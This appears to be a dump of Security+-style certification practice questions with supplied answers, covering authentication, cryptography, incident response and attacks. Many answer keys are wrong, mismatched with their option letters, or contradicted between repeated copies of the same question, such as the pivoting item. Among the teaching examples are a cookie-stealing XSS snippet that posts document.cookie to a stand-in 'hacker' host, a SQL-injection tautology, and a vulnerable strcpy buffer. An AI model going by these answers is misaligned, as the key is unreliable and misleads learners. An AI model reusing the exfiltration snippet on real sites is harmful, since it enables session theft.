QUESTION 430

A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install?

A. Vulnerability scanner

B. Network based IDS

C. Rogue System detection

D. Configuration compliance scanner

QUESTION 434

A recent internal audit is forcing a company to review each internal business unit's VMs because the clusters they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exists?

A. Buffer overflow

B. End of life systems

C. System sprawl

D. Weak configuration

C. System sprawl

QUESTION 443

Which of the following differentiates a collision attack from a rainbow table attack?

A. A rainbow table attack performs a hash lookup

B. A rainbow table attack uses the hash as a password

C. In a collision attack, the hash and the input data are equivalent

D. In a collision attack, the same input results in different hashes

C. In a collision attack, the hash and the input data are equivalent

QUESTION 446

When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said they are:

A. Escalating privilege

B. Becoming persistent

C. Fingerprinting

D. Pivoting  

D. Pivoting  

QUESTION 452

A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the most likely cause of the decreased disk space?

A. Misconfigured devices

B. Log and events anomalies

C. Authentication issues

D. unauthorized software

D. unauthorized software

QUESTION 462

Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data?

A. Symmetric encryption

B. Hash function

C. Digital Signature

D. Obfuscation

A. Symmetric encryption

QUESTION 464

A security analyst is investigating a potential breach. Upon gathering, documenting and securing the evidence, which of the following actions is the next step to minimize the business impact?

A. Launch an investigation to identify the attacking host

B. Initiate the incident response plan

C. Review lessons learned captured in the process

D. Remove malware and restore the system to normal operation

B. Initiate the incident response plan

QUESTION 468

The company has a policy that all of the employees must have their badges rekeyed at least annually. Which of the following describes this policy?

A. Physical

B. Corrective

C. Technical

D. Administrative

D. Administrative

QUESTION 470 

A forensic export is given a hard drive from a crime scen3e and is asked to perform an investigation. Which of the following is the first step the forensic expert needs to take to protect the chain of custody?

A. Make a forensic copy

B. Create a hash of the drive

C. Recover the hard drive data

D. Update the evidence log 

D. Update the evidence log 

QUESTION 478 

To help prevent one job role from having sufficient access to create, modify and approve payroll data, which of the following practices should be employed?

A. Least privilege

B. Job rotation

C. Background checks

D. Separation of duties

D. Separation of duties

QUESTION 485

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. Whilst waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation the company learns Joe's emails were intercepted. Which of the following most likely caused the data breach?

A. Policy violation

B. Social engineering

C. Insider threat

D. Zero-day attack

A. Policy violation

QUESTION 489 

A technician is investigating a potentially compromised device with the following symptoms:

Browser slowness

Frequent browser crashes

Hourglass stuck

New Search toolbar

Increased memory consumption

Which of the following types of malware has infected the system?

A. Man in the browser

B. Spoofer

C. Spyware

D. Adware

A. Man in the browser

QUESTION 496 

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a windows server. Given the following code:

Void foo (char *bar)

(

char random_user_input(12);

strcpy (random_user_input, bar) ;

)

Which of the following vulnerabilities is present?

A. Bad memory pointer

B. Buffer overflow

C. Integer overflow

D. Backdoor

B. Buffer overflow

QUESTION 499 

A user typically works remotely over the holidays, using a web based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is the likely cause?

A. The certificate has expired

B. The browser does not support SSL

C. The user's account is locked out

D. The VPN software has reached the seat license maximum

A. The certificate has expired

1.       A security administrator has placed the firewall and noticed a number of dropped connections. After looking at the data the security administrator see the following information that was flagged as a possible issue:

“SELECT *FROM” and ‘1’=’1’

Which of the following can the security administrator determine from this?

a.       An SQL injection attack is being attempted.

b.       Legitimate connections are being dropped.

c.       A network scan is being done on the system

d.       An XSS attack is being attempted.

a.       An SQL injection attack is being attempted.

3.       A company wants to provide centralized authentication for its wireless system. The wireless authentication system must integrate with the directory back end. Which of the following is a AAA solution that will provide the required wireless authentication?

a.       TACACS+

b.       MSCHAPv2

c.       RADIUS

d.       LDAP

a.       RADIUS

4.       Joe recently assumes the role of data custodian for his organization. While cleaning out an unused storage safe, he discovers several hard drives that are labeled “unclassified” and awaiting destruction. The hard drives are obsolete and cannot be installed in any if his current computing equipment. Which of the following is the BEST method of disposing of the hard drives?

a.       Burning

b.       Wiping

c.       Purging

d.       Pulverizing

D.       Pulverizing

1.       An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identify proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners?

a.       Guest account

b.       User account

c.       Shared account

d.       Privileged user account

e.       Default account

f.        Service account

D.       Privileged user account

1.       While investigating a virus infection, a security analyst discovered the following on an employee laptop;·         Multiple folders containing a large number of newly released movies and music files

·         Proprietary company data

·         A large amount of PHI data

·         Unapproved FTP software

·         Documents that appear to belong to  a competitor

Which of the following should the analyst do FIRST?

a.       Contact the legal and compliance department of guidance

b.       Delete the files, remove the FTP software, and notify management

c.       Back up the files and return the device to user

d.       Wipe and reimage the device

a.       Contact the legal and compliance department of guidance

1.       Ann, a security analyst wants to implement a secure exchange of email. Which of the following is the BEST option for Ann to implement?

a.       PGP

    b.       HTTPS

 c.       WPA

d.       TLS

a.       PGP

2.       An organization electronically processes sensitive data within a controlled facility. The chief information security officer (CISO) wants to limit emissions from emanating from the facility. Which of the following mitigates this risk?

a.       Upgrading facility cabling to a higher standard of protected cabling to reduce the likelihood of emission spillage

b.       Hardening the facility through the use of secure cabinetry to block emissions

c.       Hardening the facility with a Faraday cage to contain emissions produced from data processing

d.       Employing security guards to ensure unauthorized personnel remain outside the facility.

a.       Hardening the facility with a Faraday cage to contain emissions produced from data processing

       A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using?

a.       Banner grabbing

b.       Port scanning

c.       Packet sniffing

a.       Banner grabbing

     Which of the following are used to increase the computing time it takes to brute force a password suing an offline attack? (Select TWO)

a.       XOR

b.       PBKDF2

c.       Bcrypt

d.       HMAC

e.       RIPEMD

B.       PBKDF2

C.       Bcrypt

     A system administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites?

a.       Exteneded domain validation

b.       TLS host certificate

c.       OCSP stapling

d.       Wildcard certificate

D.       Wildcard certificate

1.       An analyst is part of a team that is investigating a potential breach of sensitive data at a large financial services organization. The organization suspects breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using sheared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was MOST likely to have been utilized to exfiltrate the proprietary data?

a.       Keylogger

b.       Botnet

c.       Crypto-malware

d.       Backdoor

e.       Ransomware

f.        DLP

D.       Backdoor

  When attackers use a compromised host as a platform for launching attacks deeper into a company’s network, it is said that they are:

a.       Escalating privilege

b.       Becoming persistent

c.       Fingerprinting

d.       Pivoting

a.       Escalating privilege

       A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?

a.       Non-intrusive credentialed scan

b.       Non-intrusive non-credentialed scan

c.       Intrusive credentialed scan

d.       Intrusive non-credentialed scan

C.       Intrusive credentialed scan

1.       A security analyst is reviewing the password policy for a service account that is used for a critical network service. The password policy for this is as follows:

Enforce password history: three passwords remembered

Maximum password age: 30 days

Minimum password age: zero days

Complexity requirements: at least one special character, one uppercase

Minimum password length: seven characters

Lockout duration: one day

Lockout threshold: five failed attempts in 15 minutes.

Which of the following adjustments would the MOST appropriate for the service account?

a.       Disable account lockout

b.       Set the maximum password age to 15 days

c.       Set the minimum password age to seven days

d.       Increase password length to 18 characters.

C.       Set the minimum password age to seven days

1.       An attacker exploited a vulnerability on a email server using the code below

<HTML><body

(‘http://hacker/post.asp?victim&message =” + document.cookie + “<br>” = “URL:”  +”document.location);/>

</body>

</HTML>

Which of the following BEST explains what the attacker is doing?

a.       The attacker is replacing cookie

b.       The attacker is stealing a document.

c.       The attacker is replacing a document

d.       The attacker is deleting a cookie

 A chief information security officer (CISO) asks the security architect to design a method for contractors to access the company’s internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO?

a.       VPN

b.       PaaS

c.       IaaS

d.       VDI

D.       VDI

1.       Which of the following is a major difference between XSS attacks and remote code exploits?

a.       XSS attacks use machine language, while remote exploits use interpreted language

b.       XSS attacks target servers, while remote code exploits target clients

c.       Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain access only

d.       Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work.

C.       Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain access only

1.       An incident response analyst at a large corporation is reviewing proxy log data. The analyst believes a malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO). Which of the following is the best NEXT step for the analyst to take?

a.       Call the CEO directly to ensure awareness of the event

b.       Run a malware scan on the CEO’s workstation

c.       Reimage the CEO’s workstation

d.       Disconnect the CEO’s workstation from the network

D.       Disconnect the CEO’s workstation from the network

A law office has been leasing dark fiber from a local telecommunications company to connect a remote office to company headquarters. The telecommunication company has decided to discontinue its dark fiber product and is offering an MPLS connection, which the law office feels is too expensive. Which of the following is the BEST solution for the law office?

a.       Remote access VPN

b.       VLAN

c.       VPN concentrator

d.       Site-to-site VPN

D.       Site-to-site VPN

As part of a corporate merger, two companies are combining resources. As a result, they must transfer files through the internet in a secure manner. Which of the following protocols would BEST meet this objective (Select TWO)

a.       LDAPS

b.       SFTP

c.       HTTPS

d.       DNSSEC

e.       SRTP

B.       SFTP

   C.       HTTPS

Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request?

a.       Retinal scan

b.       Passphrase

c.       Token fob

d.       Security question

C.       Token fob

       The user typically works remotely over the holidays, using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely to cause?

a.       The certificate has expired

b.       The browser does not support SSL

c.       The user’s account is locked out

d.       The VPN software has reached the seat license maximum.

a.       The certificate has expired

1.       An employee in the finance department receives an email, which appears to come from Chief Financial Officer (CFO), instructing the employee to immediately wire a  large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (Select TWO)

a.       Familiarity

b.       Scarcity

c.       Urgency

d.       Authority

e.       Consensus

C.     Urgency

D.       Authority

     Which of the following encryption algorithms is used primarily to secure data at rest?

a.       AES

b.       SSL

c.       TLS

d.       RSA

a.       AES

       Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical servers, which of the following is the BEST method for Joe to use?

a.       Differential

b.       Incremental

c.       Full

d.       Snapshots

a.       Differential

       Company A has acquired company B. Company A has different domains spread globally, and typically migrates its acquisitions infracture under its own domain infrastructure. Company B, however, cannot be merged into company A’s domain infrastructure. Which of the following methods would allow the two companies to access one another’s resources?

a.       Attestation

b.       Federation

c.       Single sign-on

d.       Kerberos

B.       Federation

1.       A consumer purchases an exploits from the dark web. The exploit targets the online shopping cart of a popular website, allowing the shopper to modify the price of an item at checkout. Which of the following BEST describes this type of user?

a.       Insider

b.       Script kiddie

c.       Competitor

d.       Hacktivist

e.       APT

       A security analyst is implementing PKI-based functionality to a web application that has the following requirements:

·         File contains certificate information

·         Certificate chains

·         Root authority certificate

·         Private key

All of these components will be part of one file and cryptographically protected with a password. Given this scenario, which of the following certificate types should the analyst implement to BEST meet these requirements?

a.       .pfx certificate

b.       .cer certificate

c.       .der certificate

d.       .crt certificate

a.       .pfx certificate

1.       A security administrator is reviewing the following firewall configuration after receiving reports that users are unable to connect to remote websites:

10 PERMIT FROM: ANY TO: ANY PORT: 80

20 PERMIT FROM: ANY TO: ANY PORT: 443

30 DENY FROM: ANY TO: ANY PORT: ANY

Which of the following is the MOST secure solution the security administrator can implement to fix this issue?

a.       Add the following rule the firewall: 5 PERMIT FROM: ANY TO: ANY PORT : 53

b.       Replace rule number 10 with the following to rule: 10 PERMIT FROM: ANY TO: ANY PORT : 22

c.       Insert following rule in the firewall: 25 PERMIT FROM: ANY TO: ANY PORT : ANY

d.       Remove the following rule from the firewall: 30 DENY FROM: ANY TO : ANY PORT: ANY

D.       Remove the following rule from the firewall: 30 DENY FROM: ANY TO : ANY PORT: ANY

     A company is deploying a file-sharing protocol across a network and needs to select a protocol for authenticating clients. Management require service be configured in the most secure way possible. The protocol must also be capable of mutual authentication, and support SSO and logons. Which of the following would BEST accomplish this task?

a.       Store credentials in LDAP

b.       Use NTLM authentication

c.       Implement kerberos

        d. Use MSCHAP authentication

C.       Implement kerberos

      A call center company wants to implement a domain policy primarily for its shift workers. The call center has large groups with different user roles. Management wants to monitor group performance. Which of the following is BEST solution for the company to implement?

a.       Reduced failed logon attempts

b.       Mandatory password changes

c.       Increased account lockout time

        d. Time-of-day restrictions

D. Time-of-day restrictions

      Which of the following is a compensating control that will BEST reduce the risk of weak passwords?

a.       Requiring the use of one-time tokens

b.       Increasing password history retention count

c.       Disabling user accounts after exceeding maximum attempts

d.       Setting expiration of user passwords to a shorter time

a.       Requiring the use of one-time tokens

       A company is having issues with intellectual property being sent to a competitor from its system. The information being sent is not random but has an identifiable pattern. Which of the following should be implemented in the system to shop the content from being sent?

a.       Encrypt

b.       Hashing

c.       IPS

d.       DLP

d.       DLP

Which of the following allows an auditor to test proprietary-software compiled code for security flaws?

a.       Fuzzing

b.       Static review

c.       Code signing

d.       Regression testing

c.       Code signing

       An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. The chief Information Security Officer (CISO) suggests that the organization employ desktop technology for such a large-scale upgrade. Which of the following is a security benefit of implementing an imaging solution?

a.       It allows for faster deployment

b.       It provides a consistent baseline

c.       It reduces the number of vulnerabilities

d.       It decreases the boot time

b.       It provides a consistent baseline

   Students at a residence hall are reporting internet connectivity issues. The university’s network administrator configured the residence hall’s network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall’s network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation?

a.       Router ACLs

b.       BPDU guard

c.       Flood guard

d.       DHCP snooping

a.       Router ACLs

1.       Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices on their home networks?

a.       Power off the devices when they are not in use

b.       Prevent IoT devices from contacting the internet directly

c.       Apply firmware and software updates upon availability

d.       Deploy a bastion host on the network.

c.       Apply firmware and software updates upon availability

A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take?

a.       Identify the source of the active connection.

b.       Perform eradication of the active connection and recover

c.       Perform a containment procedure by disconnecting the server

d.       Format the server and restore its initial configuration.

c.       Perform a containment procedure by disconnecting the server

    A penetration testing team deploys a specifically crafted payload to a web server, Which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?

a.       Domain hijacking

b.       Injection

c.       Buffer overflow

d.       Privilege escalation

d.       Privilege escalation

1.       A security administrator wants to determine if the company’s web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted?

a.       Non-credentialed

b.       Passive

c.       Port

d.       Credentialed

e.       Red team

f.        Active

d.       Credentialed

1.       An employee workstation with an IP address of 204.211.38.211/24 reports it is unable to submit print jobs to a network printer at 204.211.38.52/24 after firewall upgrade. The active firewall rules are as follows:

IP Address                          Protocol               Port Number                      Action

204.211.38.1/24                ALL                         ALL                                         Permit

204.211.38.211/24            ALL                         ALL                                         Permit

204.211.38.52/24              UDP                       631                                         Permit

204.211.38.52/24              TCP                        25                                           Deny

Assuming port numbers have not been changed from their defaults, which of the following should be modified to allow printing to the network printer?

a.       The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP

b.       The deny statement for 204.211.38.52/24 should be changed to a permit statement

c.       The permit statement for 204.211.38.52/24 should be changed to UDP port 443 instead of 631

d.       The permit statement for 204.211.38.52/24 should be changed to TCP port 631 only instead of ALL.

a.       The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP

QUESTION 429

A penetration tester has written an application that performs a bit by bit XOR OxFF operation on binaries prior to transmission over trusted media. Which of the following best describes the action performed by this type of application?

A. Hashing

B. Key Exchange

C. Encryption

D. Obfuscation

D. Obfuscation

QUESTION 430

A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install? 

A. Vulnerability scanner

B. Network based IDS

C. Rogue System detection

D. Configuration compliance scanner

C. Rogue System detection

QUESTION 432

Users from two organizations, each with its own PKI, need to begin working together on a new project. Which of the following would allow the users of the separate PKIs to work together without connections errors? 

A. Trust model

B. Stapling

C. Intermediate CA

D. Key escrow  

A. Trust model

QUESTION 434

A recent internal audit is forcing a company to review each internal businesses unit's VMs because the clusters they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exists?

A. Buffer overflow

B. End of life systems

C. System sprawl

D. Weak configuration 

C. System sprawl

QUESTION 435

Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal?

A. PIN

B. Security question

C. Smart Card

D. Passphrase

E. CAPTCHA

C. Smart Card

QUESTION 436

An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented?

A. Use a camera for facial recognition

B. Have users sign their name naturally

C. Require a palm geometry scan

D. Implement iris recognition

B. Have users sign their name naturally

QUESTION 437

Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third party software application?

A. Sandboxing

B. Encryption

C. Code signing

D. Fuzzing 

A. Sandboxing

QUESTION 438

Which of the following best describes a network based attack that can allow an attacker to take full control of a vulnerable host? 

A. Remote exploit

B. Amplification

C. Sniffing

D. Man-in-the middle attack

A. Remote exploit

QUESTION 439

A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to minimize the risk?

A. Enable CHAP

B. Disable NTLM

C. Enable Kerberos

D. Disable PAP  

B. Disable NTLM

QUESTION 441

A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permissions settings. Which of the following produced the report?

A. Vulnerability scanner

B. Protocol scanner

C. Network mapper

D. Web inspector

A. Vulnerability scanner

QUESTION 442

A security specialist must confirm file backups match the original copy. Which of the following should th3e security specialist use to accomplish the objective?

A. AES

B. 3DES

C. MD5

D. RSA

C. MD5

QUESTION 443

Which of the following differentiates a collision attack from a rainbow table attack?

A. A rainbow table attack performs a hash lookup

B. A rainbow table attack uses the hash as a password

C. In a collision attack, the hash and the input data are equivalent

D. In a collision attack, the same input results in different hashes

C. In a collision attack, the hash and the input data are equivalent

QUESTION 445

Which of the following refers to the term to restore a system to its operational state?

A. MTBF

B. MTTR

C. RTO

D. RPO

B. MTTR

QUESTION 446

When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said they are:

A. Escalating privilege

B. Becoming persistent

C. Fingerprinting

D. Pivoting  

D. Pivoting  

QUESTION 447

An active/passive configuration has an impact on:

A. Confidentiality

B. Integrity

C. Availability

D. Non-Repudiation

C. Availability

QUESTION 448 

Which of the following would provide additional security by adding another factor to a smart card? 

A. Token 

B. Proximity badge 

C. Physical key 

D. PIN 

D. PIN

QUESTION 449

A security administrator is developing controls for creating audit trails if a PHI data breach is to occur. The administrator has been given the following requirements:

All access must be correlated to a user account

All user accounts must be assigned to a single individual

User access to the PHI data must be recorded

Anomalies in PHI data access must be reported

Logs and Records cannot be deleted or modified

Which of the following should the administrator implement to meet the above requirements? (Select three)

A. Eliminate shared accounts

B. Create a standard naming convention for accounts

C. Implement usage auditing and review

D. Enable account lockout thresholds

E. Copy logs in real time to a secured WORM drive

F. Implement time of day restrictions

G. Perform regular permission audits and reviews

A. Eliminate shared accounts

C. Implement usage auditing and review

E. Copy logs in real time to a secured WORM drive

QUESTION 450

A security administrator receives an alert from a third party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four thousand different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be best for the security administrator to implement to most efficiently assist with this issue?

A. SSL

B. CRL

C. PKI

D. ACL

B. CRL

QUESTION 451

An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router?

A. WPA + CCMP

B. WPA2 + CCMP

C. WPA + TKIP

D. WPA2 + TKIP  

C. WPA + TKIP

QUESTION 452

A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the most likely cause of the decreased disk space?

A. Misconfigured devices

B. Log and events anomalies

C. Authentication issues

D. unauthorized software

D. unauthorized software

QUESTION 453

A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario. Which of the following would be best method of configuring the load balancer?

A. Round robin

B. Weighted

C. Least connection

D. Locality based

D. Locality based

QUESTION 454

A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network?

A. Open wireless network and SSL VPN

B. WPA using a preshared key

C. WPA2 using a RADIUS back end for 802.1x authentication

D. WEP with a 40 bit key

A. Open wireless network and SSL VPN

QUESTION 457

A security engineer wants to implement a site to site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel?

A. Tunnel mode IPSec

B. Transport mode VPN IPSec

C. L2TP

D. SSL VPN

D. SSL VPN

QUESTION 458

A company is looking for an authentication protocol that uses tickets and time stamps to ensure the validity and prevent against replay attacks. Which of the following would be best suited to meet this requirement?

A. TACACS+

B. Kerberos

C. RADIUS

D. MSCHAP

B. Kerberos

QUESTION 459

Which of the following is used to validate the integrity of data?

A. CBC

B. Blowfish

C. MD5

D. RSA

C. MD5

QUESTION 460

Which of the following threat actors is most likely to steal a company's proprietary information to gain a market edge and reduce time to market?

A. Competitor

B. Hacktivist

C. Insider

D. Organized crime

A. Competitor

QUESTION 461

A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in clear text. Which of the following protocols should the company use to transfer files?

A. HTTPS

B. LDAPS

C. SCP

D. SNMPv3

A. HTTPS

QUESTION 462

Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data?

A. Symmetric encryption

B. Hash function

C. Digital Signature

D. Obfuscation

A. Symmetric encryption

QUESTION 463

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant configuration items. Which of the following best describe why this has occurred? (Select two)

A. Privileged user credentials were used to scan the host

B. Non-applicable plugins were selected in the scan policy

C. The incorrect audit file was used

D. The output of the report contains false positives

E. The target host has been compromised  

B. Non-applicable plugins were selected in the scan policy

C. The incorrect audit file was used

QUESTION 464

A security analyst is investigating a potential breach. Upon gathering, documenting and securing the evidence, which of the following actions is the next step to minimize the business impact?

A. Launch an investigation to identify the attacking host

B. Initiate the incident response plan

C. Review lessons learned captured in the process

D. Remove malware and restore the system to normal operation

B. Initiate the incident response plan

QUESTION 465

The computer resource center issued smartphones to all first level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implement to control the types of tools the managers install?

A. Download manager

B. Content Manager

C. Segmentation Manager

D. Application Manager

A. Download manager

QUESTION 466

Based on risk assessment, the ARO value of a malware infection for the server is 5. The annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the protection?

A. $500

B. $1000

C. $2000

D. $2500

A. $500

QUESTION 468

The company has a policy that all of the employees must have their badges rekeyed at least annually. Which of the following describes this policy?

A. Physical

B. Corrective

C. Technical

D. Administrative

D. Administrative

QUESTION 469

A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is in a hurricane affected area and the disaster recovery site is 100 miles (161km) away. The company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement?

A. Hot site

B. Warm site

C. Cold site

D. Cloud based site

D. Cloud based site

QUESTION 470

A forensic export is given a hard drive from a crime scen3e and is asked to perform an investigation. Which of the following is the first step the forensic expert needs to take to protect the chain of custody?

A. Make a forensic copy

B. Create a hash of the drive

C. Recover the hard drive data

D. Update the evidence log 

D. Update the evidence log 

QUESTION 473

An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would best resolve the vulnerability?

A. Faraday cage

B. Air gap

C. Mantrap

D. Bollards

C. Mantrap

QUESTION 474

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the Operating System?

A. Privilege escalation

B. Pivoting

C. Process affinity

D. Buffer overflow

B. Pivoting

QUESTION 474

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the Operating System?

A. Privilege escalation

B. Pivoting

C. Process affinity

D. Buffer overflow

B. Pivoting

QUESTION 475

A bank is experiencing a DoS attack against an application designed to handle 500 IP based sessions. In addition, the perimeter router can only handle 1 Gbps of traffic. Which of the following should be implemented to prevent DoS attacks in the future?

A. Deploy multiple web servers and implement a load balancer

B. Increase the capacity of the perimeter router to 10Gbps

C. Install a firewall at the network border to prevent all attacks

D. Use redundancy across all network devices and services

D. Use redundancy across all network devices and services

QUESTION 478

To help prevent one job role from having sufficient access to create, modify and approve payroll data, which of the following practices should be employed?

A. Least privilege

B. Job rotation

C. Background checks

D. Separation of duties

D. Separation of duties

QUESTION 479

The Chief Security Officer of a university is concerned about potential transmissions of username and passwords in clear text when authenticating to a directory server. Which of the following would best mitigate the CISOs concerns?

A. SFTP

B. SNMPv3

C. LDAPS

D. SMB

A. SFTP

QUESTION 480

When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be most suited?

A. Infrastructure

B. Platform

C. Software

D. Virtualization

C. Software

QUESTION 483

An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the best solutions for the organization? (Select two).

A. TACACS+

B. CHAP

C. LDAP

D. RADIUS

E. MSCHAPv2

A. TACACS+

D. RADIUS

QUESTION 484

Which of the following types of social engineering attacks targets Chief Information Officers over email?

A. Whaling

B. Vishing

C. Tailgating

D. Spear Phishing

A. Whaling

QUESTION 485

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. Whilst waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation the company learns Joe's emails were intercepted. Which of the following most likely caused the data breach?

A. Policy violation

B. Social engineering

C. Insider threat

D. Zero-day attack

A. Policy violation

QUESTION 486

Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. User's email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken first? (Select two).

A. Disable the compromised accounts

B. Update WAF rules to block social networks

C. Remove the compromised accounts from all AD groups

D. Change the compromised accounts' passwords

E. Disable open relay on the email server

F. Enable sender policy framework

E. Disable open relay on the email server

F. Enable sender policy framework

QUESTION 487

A security administrator has written a script that will automatically upload binary and text based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select two).

A. TOTP

B. SCP

C. FTP over a nonstandard port

D. SRTP

E. Certificate based authentication

F. SNMPv3  

B. SCP

E. Certificate based authentication

QUESTION 488

A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exhilarated through an active connection. Which of the following is the next step the team should take?

A. Identify the source of the active connection

B. Perform eradication on the active connection and recover

C. Perform a containment procedure by disconnecting the server

D. Format the server and restore its initial configuration

C. Perform a containment procedure by disconnecting the server

QUESTION 489

A technician is investigating a potentially compromised device with the following symptoms:

Browser slowness

Frequent browser crashes

Hourglass stuck

New Search toolbar

Increased memory consumption

Which of the following types of malware has infected the system?

A. Man in the browser

B. Spoofer

C. Spyware

D. Adware

A. Man in the browser

QUESTION 490

A company wants to provide and for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement?

A. Shared accounts

B. Pre-shared passwords

C. Least privilege

D. Sponsored guest

C. Least privilege

QUESTION 493

A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?

A. Accounting

B. Authorization

C. Authentication

D. Identification

A. Accounting

QUESTION 494

Most organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all organizations use the native 802.1x client on their mobile devices?

A. Shibboleth

B. RADIUS federation

C. SAML

D. OAuth

E. OpenID Connect

B. RADIUS federation

QUESTION 495

A software developer is concerned about DLL hijacking in an application being written. Which of the following is the most viable mitigation measure of this type of attack?

A. The DLL of each application should be set individually

B. All calls to different DLLs should be hard coded in the application

C. Access to DLLs from the Windows registry should be disabled

D. The affected DLLs should be renamed to avoid future hijacking

C. Access to DLLs from the Windows registry should be disabled

QUESTION 496

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a windows server. Given the following code:

Void foo (char *bar)

(

char random_user_input(12);

strcpy (random_user_input, bar) ;

)

Which of the following vulnerabilities is present?

A. Bad memory pointer

B. Buffer overflow

C. Integer overflow

D. Backdoor

B. Buffer overflow

QUESTION 497

An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data:

Which of the following would be the BEST method to prevent similar audit findings in the future?

A. Implement separation of duties for the payroll department

B. Implement a DLP solution on the payroll and HR servers

